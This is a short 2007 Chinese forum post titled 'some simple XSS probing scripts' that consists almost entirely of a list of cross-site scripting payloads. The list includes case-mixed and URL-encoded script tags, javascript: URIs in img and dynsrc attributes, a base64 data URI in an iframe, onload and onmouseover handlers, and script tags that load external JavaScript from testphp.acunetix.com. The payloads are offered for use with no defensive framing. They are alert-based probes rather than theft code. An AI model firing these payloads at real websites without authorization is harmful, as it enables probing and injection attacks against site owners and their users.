zyp 发表于 2007-7-15 22:23:32

XSS的一些简单探测脚本

<br/>alert(123456)%3B<br/>&gt;'&gt;/ScRiPt&gt;<br/>&gt;&quot;&gt;/ScRiPt&gt;<br/>ScRiPt%20%0a%0d&gt;alert(123456)%3B/title&gt;/ScRiPt&gt;<br/>--&gt;/ScRiPt&gt;<br/>email@some/ScRiPt&gt;domain.com<br/>&#91;img&#93;JaVaScRiPt:alert(123456)%3B&#91;/img&#93;<br/>%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28123456%29%3B%22%3E<br/>/script&gt;<br/>script&gt;t&gt;alert(123456)%3B/script&gt;t&gt;<br/>FRAMESET&gt;/FRAMESET&gt;<br/>%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28123456%29%3B%22%3E<br/>iframe+src=http://www.winshell.cn/read.php/&quot;data:text/html%3Bbase64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=&quot;+invalid=&quot;123456&quot;&gt;<br/>body+onload=alert(123456)&gt;<br/>ScRiPt+src=http://testphp.acunetix.com/xss.js?123456&gt;script/xss+src=http://testphp.acunetix.com/xss.js?123456&gt;img+src=http://testphp.acunetix.com/dot.gif+onload=alert(123456)&gt;<br/>+style='background:url(JaVaScRiPt:alert(123456))'+invalidparam='<br/>%253CScRiPt%253Ealert(123456)%3B%253C/ScRiPt%253E<br/>/ScRiPt&gt;<br/>&quot;+onmouseover=&quot;alert(123456)<br/>ScRiPt%20%0a%0d&gt;alert(123456)%3B&lt;/ScRiPt&gt;
页: [1]
查看完整版本: XSS的一些简单探测脚本